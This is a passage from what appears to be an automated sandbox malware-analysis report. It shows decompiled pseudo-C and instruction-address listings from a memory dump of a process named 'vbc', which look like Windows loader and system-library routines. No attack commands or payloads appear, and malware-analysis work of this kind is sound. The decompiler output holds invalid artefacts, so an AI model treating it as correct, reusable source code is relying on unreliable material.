                                                  0x015c8671
                                                  0x015c8671
                                                  0x015c8674
                                                  0x015c8676
                                                  0x01619bae
                                                  0x01619bae
                                                  0x015c8676
                                                  0x015c867c
                                                  0x015c867e
                                                  0x015c8688
                                                  0x015c8688
                                                  0x00000000
                                                  0x015c867e
                                                  0x015c8638
                                                  0x015c8638
                                                  0x015c863b
                                                  0x015c863e
                                                  0x015c863f
                                                  0x015c8642
                                                  0x015c8645
                                                  0x015c8648
                                                  0x015c864d
                                                  0x01619b69
                                                  0x01619b6e
                                                  0x01619b7b
                                                  0x01619b81
                                                  0x01619b85
                                                  0x01619b89
                                                  0x01619ba7
                                                  0x01619b8b
                                                  0x01619b91
                                                  0x01619b9a
                                                  0x01619b9f
                                                  0x01619b9f
                                                  0x015c8788
                                                  0x015c878d
                                                  0x015c8763
                                                  0x015c8763
                                                  0x015c8766
                                                  0x00000000
                                                  0x015c8766
                                                  0x01619b70
                                                  0x00000000
                                                  0x01619b70
                                                  0x015c8656
                                                  0x015c865a
                                                  0x015c865c
                                                  0x015c8752
                                                  0x015c8756
                                                  0x00000000
                                                  0x00000000
                                                  0x015c875e
                                                  0x00000000
                                                  0x015c875e
                                                  0x015c8662
                                                  0x015c8662
                                                  0x015c8662
                                                  0x015c8666
                                                  0x00000000
                                                  0x015c8666
                                                  0x015c85b7
                                                  0x015c85b9
                                                  0x015c85bc
                                                  0x015c85bf
                                                  0x015c85cc
                                                  0x015c85d1
                                                  0x015c85d4
                                                  0x015c85db
                                                  0x015c85de
                                                  0x015c85e0
                                                  0x01619b5f
                                                  0x00000000
                                                  0x01619b5f
                                                  0x015c85e6
                                                  0x015c85ea
                                                  0x015c86c3
                                                  0x015c86c5
                                                  0x015c86c8
                                                  0x015c86ca
                                                  0x01619b16
                                                  0x00000000
                                                  0x01619b16
                                                  0x015c86d6
                                                  0x015c85f6
                                                  0x015c85f6
                                                  0x015c85f9
                                                  0x015c8602
                                                  0x015c8606
                                                  0x015c860a
                                                  0x015c860b
                                                  0x015c860e
                                                  0x015c8611
                                                  0x00000000
                                                  0x015c8611
                                                  0x015c85f3
                                                  0x00000000
                                                  0x015c85f3
                                                  0x015c8619
                                                  0x015c861e
                                                  0x015c861e
                                                  0x015c8621
                                                  0x015c8622
                                                  0x015c8623
                                                  0x015c8625
                                                  0x015c862c
                                                  0x00000000
                                                  0x015c873d
                                                  0x00000000
                                                  0x015c873d
                                                  0x015c8737
                                                  0x015c850f
                                                  0x015c8512
                                                  0x00000000
                                                  0x015c8512
                                                  0x00000000
                                                  0x015c84d6

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 99f609393c356c7b55edf6bd37f430e639dcf4b36747ba8e5cec90fe951aedcc
                                                  • Instruction ID: bbdfbfcc2cec82a0921d5e752658973f5db139269a6793c392650453a81ddfd2
                                                  • Opcode Fuzzy Hash: 99f609393c356c7b55edf6bd37f430e639dcf4b36747ba8e5cec90fe951aedcc
                                                  • Instruction Fuzzy Hash: 6DB15BB0E0020ADFDB25DFE8C984AAEBBB5BF98708F14452EE505AF345D770A941CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015E513A Relevance: .3, Instructions: 258COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 67%
                                                  			E015E513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x16ad360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E015FD0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E015D2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L015D4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E015FF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E015CFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x16ab1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E015FB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                  0x015e5142
                                                  0x015e514c
                                                  0x015e5150
                                                  0x015e5157
                                                  0x015e5159
                                                  0x015e515e
                                                  0x015e5165
                                                  0x015e5169
                                                  0x015e516c
                                                  0x015e5172
                                                  0x015e5176
                                                  0x015e517a
                                                  0x015e517a
                                                  0x015e517a
                                                  0x015e517f
                                                  0x01626d8b
                                                  0x01626d8e
                                                  0x01626d91
                                                  0x01626d95
                                                  0x01626d98
                                                  0x01626d9c
                                                  0x01626da0
                                                  0x01626da3
                                                  0x01626da7
                                                  0x01626e26
                                                  0x01626e26
                                                  0x01626e2a
                                                  0x015e51f9
                                                  0x015e51f9
                                                  0x015e51fe
                                                  0x01626e33
                                                  0x01626e33
                                                  0x01626e39
                                                  0x01626e3d
                                                  0x01626e46
                                                  0x01626e50
                                                  0x00000000
                                                  0x00000000
                                                  0x01626e52
                                                  0x01626e53
                                                  0x01626e56
                                                  0x01626e5d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01626e5f
                                                  0x01626e67
                                                  0x01626e77
                                                  0x01626e7f
                                                  0x01626e80
                                                  0x01626e88
                                                  0x01626e90
                                                  0x01626e9f
                                                  0x01626ea5
                                                  0x01626ea9
                                                  0x01626eb1
                                                  0x01626ebf
                                                  0x00000000
                                                  0x00000000
                                                  0x01626ecf
                                                  0x01626ed3
                                                  0x00000000
                                                  0x00000000
                                                  0x01626edb
                                                  0x01626ede
                                                  0x01626ee1
                                                  0x01626ee8
                                                  0x01626eeb
                                                  0x01626eed
                                                  0x01626ef0
                                                  0x01626ef4
                                                  0x01626ef8
                                                  0x01626efc
                                                  0x00000000
                                                  0x00000000
                                                  0x01626f0d
                                                  0x01626f11
                                                  0x01626f32
                                                  0x01626f37
                                                  0x01626f3b
                                                  0x01626f3e
                                                  0x01626f41
                                                  0x01626f46
                                                  0x00000000
                                                  0x00000000
                                                  0x01626f4c
                                                  0x01626f50
                                                  0x01626f50
                                                  0x01626f54
                                                  0x01626f62
                                                  0x01626f65
                                                  0x01626f6d
                                                  0x01626f7b
                                                  0x01626f7b
                                                  0x01626f93
                                                  0x01626f98
                                                  0x01626fa0
                                                  0x01626fa6
                                                  0x01626fb3
                                                  0x01626fb6
                                                  0x01626fbf
                                                  0x01626fc1
                                                  0x01626fd5
                                                  0x01626fda
                                                  0x01626fda
                                                  0x01626fdd
                                                  0x01626fe2
                                                  0x01626fe7
                                                  0x01626feb
                                                  0x01626fef
                                                  0x01626ff3
                                                  0x015e520c
                                                  0x015e520c
                                                  0x015e520f
                                                  0x015e5215
                                                  0x015e5234
                                                  0x015e523a
                                                  0x015e523a
                                                  0x015e5244
                                                  0x015e5245
                                                  0x015e5246
                                                  0x015e5251
                                                  0x015e5251
                                                  0x01626f13
                                                  0x01626f17
                                                  0x01626f17
                                                  0x01626f18
                                                  0x01626f1b
                                                  0x01626f1f
                                                  0x01626f23
                                                  0x00000000
                                                  0x01626f28
                                                  0x015e5204
                                                  0x015e5204
                                                  0x015e5208
                                                  0x00000000
                                                  0x015e5208
                                                  0x015e5185
                                                  0x015e5188
                                                  0x015e518a
                                                  0x015e518e
                                                  0x015e5195
                                                  0x01626db1
                                                  0x01626db5
                                                  0x01626db9
                                                  0x015e519b
                                                  0x015e519b
                                                  0x015e519e
                                                  0x015e51a7
                                                  0x015e51a9
                                                  0x015e51a9
                                                  0x015e51b5
                                                  0x015e51b8
                                                  0x015e51bb
                                                  0x015e51be
                                                  0x015e51c1
                                                  0x015e51c5
                                                  0x015e51c9
                                                  0x015e51cd
                                                  0x015e51cd
                                                  0x015e51d8
                                                  0x015e51dc
                                                  0x015e51e0
                                                  0x01626dcc
                                                  0x01626dd0
                                                  0x01626dd5
                                                  0x01626ddd
                                                  0x01626de1
                                                  0x01626de1
                                                  0x01626de5
                                                  0x01626deb
                                                  0x01626df1
                                                  0x01626df7
                                                  0x01626dfd
                                                  0x01626e01
                                                  0x01626e05
                                                  0x01626e09
                                                  0x01626e0d
                                                  0x01626e11
                                                  0x01626e11
                                                  0x015e51eb
                                                  0x01626e1a
                                                  0x01626e1f
                                                  0x01626e21
                                                  0x01626e23
                                                  0x00000000
                                                  0x015e51f1
                                                  0x015e51f1
                                                  0x00000000
                                                  0x015e51f1

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 684415f9fd8c657cae2866fcffe063278a2122eb491977de1cfc158ca5528666
                                                  • Instruction ID: 32c21387725832c9128580f956d52995443293d221c4dc3df00519d16c9c03a2
                                                  • Opcode Fuzzy Hash: 684415f9fd8c657cae2866fcffe063278a2122eb491977de1cfc158ca5528666
                                                  • Instruction Fuzzy Hash: 50C1F1755087818FD358CF28C980A6AFBE1BF88308F144A6EF9998B352D771E945CF52
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015E03E2 Relevance: .3, Instructions: 254COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 74%
                                                  			E015E03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x16ad360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E015E0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E015FB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E015CB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x16a7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E015D7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E015D7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E01637016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E015F9830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E016369A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x16a7c04 != 0) {
						_t118 = _v12;
						_t120 = E0163A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x16a7bd8;
						if( *0x16a7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E015F95D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E015F99A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E01633540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E015BB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E015FAAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x16a8474 - 3;
										if( *0x16a8474 != 3) {
											 *0x16a79dc =  *0x16a79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E015D7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E015D7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E01637016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x16a8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x16a7b00; // 0x0
							asm("ror esi, cl");
							 *0x16ab1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E015F95D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E015C7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                  0x015e03f1
                                                  0x015e03f7
                                                  0x015e03f9
                                                  0x015e03fb
                                                  0x015e03fd
                                                  0x015e0400
                                                  0x015e040a
                                                  0x01624c7a
                                                  0x015e0537
                                                  0x015e0547
                                                  0x015e0410
                                                  0x015e0410
                                                  0x015e0414
                                                  0x015e0417
                                                  0x015e041a
                                                  0x015e0421
                                                  0x015e0424
                                                  0x015e042b
                                                  0x015e043b
                                                  0x015e043e
                                                  0x015e043f
                                                  0x015e043f
                                                  0x015e0446
                                                  0x015e0449
                                                  0x015e044c
                                                  0x015e044f
                                                  0x015e0459
                                                  0x01624c8d
                                                  0x015e045f
                                                  0x015e045f
                                                  0x015e045f
                                                  0x015e0467
                                                  0x01624c97
                                                  0x01624c9d
                                                  0x01624ca4
                                                  0x01624caa
                                                  0x01624caf
                                                  0x01624cb1
                                                  0x01624cc3
                                                  0x01624cb3
                                                  0x01624cbc
                                                  0x01624cbc
                                                  0x01624cc8
                                                  0x01624ccb
                                                  0x01624cd7
                                                  0x01624cda
                                                  0x01624cdf
                                                  0x01624cdf
                                                  0x01624ccb
                                                  0x01624ca4
                                                  0x015e046d
                                                  0x015e046f
                                                  0x015e046f
                                                  0x015e0471
                                                  0x015e0476
                                                  0x015e047a
                                                  0x015e047b
                                                  0x015e0483
                                                  0x015e0489
                                                  0x015e048d
                                                  0x00000000
                                                  0x00000000
                                                  0x01624ce9
                                                  0x01624cef
                                                  0x01624d22
                                                  0x01624d22
                                                  0x00000000
                                                  0x01624d22
                                                  0x01624cf1
                                                  0x01624cf7
                                                  0x00000000
                                                  0x00000000
                                                  0x01624cf9
                                                  0x01624cff
                                                  0x00000000
                                                  0x00000000
                                                  0x01624d05
                                                  0x01624d07
                                                  0x00000000
                                                  0x00000000
                                                  0x01624d0d
                                                  0x01624d0f
                                                  0x01624d14
                                                  0x01624d16
                                                  0x00000000
                                                  0x00000000
                                                  0x01624d1c
                                                  0x01624d1c
                                                  0x015e0499
                                                  0x015e0535
                                                  0x015e0535
                                                  0x00000000
                                                  0x015e0535
                                                  0x015e04a6
                                                  0x01624d2c
                                                  0x01624d37
                                                  0x01624d39
                                                  0x01624d3b
                                                  0x00000000
                                                  0x00000000
                                                  0x01624d41
                                                  0x01624d48
                                                  0x015e0527
                                                  0x015e052b
                                                  0x015e052d
                                                  0x015e0530
                                                  0x015e0530
                                                  0x00000000
                                                  0x015e052b
                                                  0x01624d4e
                                                  0x015e04ac
                                                  0x015e04ac
                                                  0x015e04af
                                                  0x015e04b2
                                                  0x015e04b7
                                                  0x015e04b9
                                                  0x015e04bb
                                                  0x015e04bd
                                                  0x015e04bf
                                                  0x015e04c5
                                                  0x015e04c9
                                                  0x01624d53
                                                  0x01624d59
                                                  0x01624db9
                                                  0x01624dba
                                                  0x01624dbf
                                                  0x01624dc2
                                                  0x01624dc4
                                                  0x01624dc7
                                                  0x01624dce
                                                  0x00000000
                                                  0x01624dce
                                                  0x01624d5b
                                                  0x01624d61
                                                  0x00000000
                                                  0x00000000
                                                  0x01624d63
                                                  0x01624d69
                                                  0x00000000
                                                  0x00000000
                                                  0x01624d6b
                                                  0x01624d6e
                                                  0x01624d74
                                                  0x01624d76
                                                  0x01624d7c
                                                  0x01624d7e
                                                  0x01624d84
                                                  0x01624d89
                                                  0x01624d8c
                                                  0x01624d8d
                                                  0x01624d92
                                                  0x01624d95
                                                  0x01624d96
                                                  0x01624d98
                                                  0x01624d9a
                                                  0x01624d9f
                                                  0x01624da4
                                                  0x01624da6
                                                  0x01624da8
                                                  0x01624daf
                                                  0x01624db1
                                                  0x01624db1
                                                  0x01624daf
                                                  0x01624da6
                                                  0x01624d84
                                                  0x01624d7c
                                                  0x00000000
                                                  0x01624d74
                                                  0x015e04d6
                                                  0x01624de1
                                                  0x015e04dc
                                                  0x015e04dc
                                                  0x015e04dc
                                                  0x015e04e4
                                                  0x01624deb
                                                  0x01624df1
                                                  0x01624df8
                                                  0x01624dfe
                                                  0x01624e03
                                                  0x01624e05
                                                  0x01624e17
                                                  0x01624e07
                                                  0x01624e10
                                                  0x01624e10
                                                  0x01624e1c
                                                  0x01624e1f
                                                  0x01624e35
                                                  0x01624e35
                                                  0x01624e1f
                                                  0x01624df8
                                                  0x015e04f1
                                                  0x015e04fa
                                                  0x01624e3f
                                                  0x01624e47
                                                  0x01624e5b
                                                  0x01624e61
                                                  0x01624e67
                                                  0x01624e69
                                                  0x01624e71
                                                  0x01624e73
                                                  0x015e0500
                                                  0x015e0500
                                                  0x015e0500
                                                  0x015e04fa
                                                  0x015e0508
                                                  0x015e051d
                                                  0x015e051d
                                                  0x015e051f
                                                  0x015e0524
                                                  0x00000000
                                                  0x015e0524
                                                  0x015e0515
                                                  0x015e0517
                                                  0x01624e7a
                                                  0x01624e7c
                                                  0x00000000
                                                  0x00000000
                                                  0x01624e85
                                                  0x00000000
                                                  0x01624e85
                                                  0x00000000
                                                  0x015e0517

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1d0b42414ed50a3634d3772f275e81a19ff242acb1b329aa6ea037bea9074814
                                                  • Instruction ID: b423941f54e0c8dd8b406ebd965a35388d08d8252ed38f9c92ff98efe9d46343
                                                  • Opcode Fuzzy Hash: 1d0b42414ed50a3634d3772f275e81a19ff242acb1b329aa6ea037bea9074814
                                                  • Instruction Fuzzy Hash: FA910532F00A269FEB359A6CCC48BAD7BE4BB41714F050665FA51AF2D1DBB49C00CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015BC600 Relevance: .2, Instructions: 225COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 67%
                                                  			E015BC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x16ad360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E015C6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E015FB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
